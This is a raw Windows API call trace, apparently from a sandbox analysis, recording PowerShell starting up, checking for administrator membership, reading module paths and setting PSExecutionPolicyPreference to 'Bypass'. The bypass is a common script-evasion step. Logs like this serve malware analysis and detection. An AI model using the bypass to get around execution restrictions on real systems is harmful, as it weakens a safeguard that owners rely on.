	[0073.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0085.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0088.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0095.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0095.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0099.798] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0099.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.798] CoTaskMemFree (pv=0x4be2b0) 
	[0099.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0101.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.783] bsearch (_Key=0x29b010, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0107.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.803] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0107.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.803] CoTaskMemFree (pv=0x4be2b0) 
	[0107.806] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0107.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.806] CoTaskMemFree (pv=0x4be2b0) 
	[0107.806] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0107.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.806] CoTaskMemFree (pv=0x4be2b0) 
	[0107.809] CoCreateGuid (in: pguid=0x29ddf8 | out: pguid=0x29ddf8*(Data1=0xc4acaf49, Data2=0x86a3, Data3=0x4f92, Data4=([0]=0x89, [1]=0x4e, [2]=0x77, [3]=0x6e, [4]=0x72, [5]=0x2b, [6]=0xe4, [7]=0x50))) returned 0x0
	[0108.625] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0108.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.625] CoTaskMemFree (pv=0x4be2b0) 
	[0108.628] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0108.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.628] CoTaskMemFree (pv=0x4be2b0) 
	[0108.912] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0108.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.912] CoTaskMemFree (pv=0x4be2b0) 
	[0108.918] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0108.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x29daa0 | out: lpConsoleScreenBufferInfo=0x29daa0) returned 1
	[0108.924] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0108.924] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x29daa0 | out: lpConsoleScreenBufferInfo=0x29daa0) returned 1
	[0108.925] GetVersionExW (in: lpVersionInformation=0x29da30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29da30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0108.928] GetCurrentProcess () returned 0xffffffffffffffff
	[0108.928] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x29dac8 | out: TokenHandle=0x29dac8*=0x1d0) returned 1
	[0108.932] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x29d9e8 | out: TokenInformation=0x0, ReturnLength=0x29d9e8) returned 0
	[0108.933] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4338c0
	[0108.933] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x4338c0, TokenInformationLength=0x4, ReturnLength=0x29d9e8 | out: TokenInformation=0x4338c0, ReturnLength=0x29d9e8) returned 1
	[0108.934] DuplicateTokenEx (in: hExistingToken=0x1d0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x29db48 | out: phNewToken=0x29db48*=0x1c8) returned 1
	[0108.934] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x29d9e8 | out: TokenInformation=0x0, ReturnLength=0x29d9e8) returned 0
	[0108.934] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4338f0
	[0108.934] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x4338f0, TokenInformationLength=0x4, ReturnLength=0x29d9e8 | out: TokenInformation=0x4338f0, ReturnLength=0x29d9e8) returned 1
	[0108.935] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2dabd28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x29db58 | out: IsMember=0x29db58) returned 1
	[0108.935] CloseHandle (hObject=0x1c8) returned 1
	[0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.658] GetConsoleWindow () returned 0x4021a
	[0136.864] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.867] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e8
	[0137.000] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0137.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.000] CoTaskMemFree (pv=0x4be2b0) 
	[0137.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.958] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0141.958] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.958] CoTaskMemFree (pv=0x4be2b0) 
	[0141.959] CoTaskMemAlloc (cb=0xcc) returned 0x4ec8b0
	[0141.959] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4ec8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.959] CoTaskMemFree (pv=0x4ec8b0) 
	[0141.959] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d7b8 | out: phkResult=0x29d7b8*=0x328) returned 0x0
	[0141.959] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29d73c, lpData=0x0, lpcbData=0x29d738*=0x0 | out: lpType=0x29d73c*=0x2, lpData=0x0, lpcbData=0x29d738*=0x6c) returned 0x0
	[0141.959] CoTaskMemAlloc (cb=0x70) returned 0x4652d0
	[0141.959] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29d70c, lpData=0x4652d0, lpcbData=0x29d708*=0x6c | out: lpType=0x29d70c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x29d708*=0x6c) returned 0x0
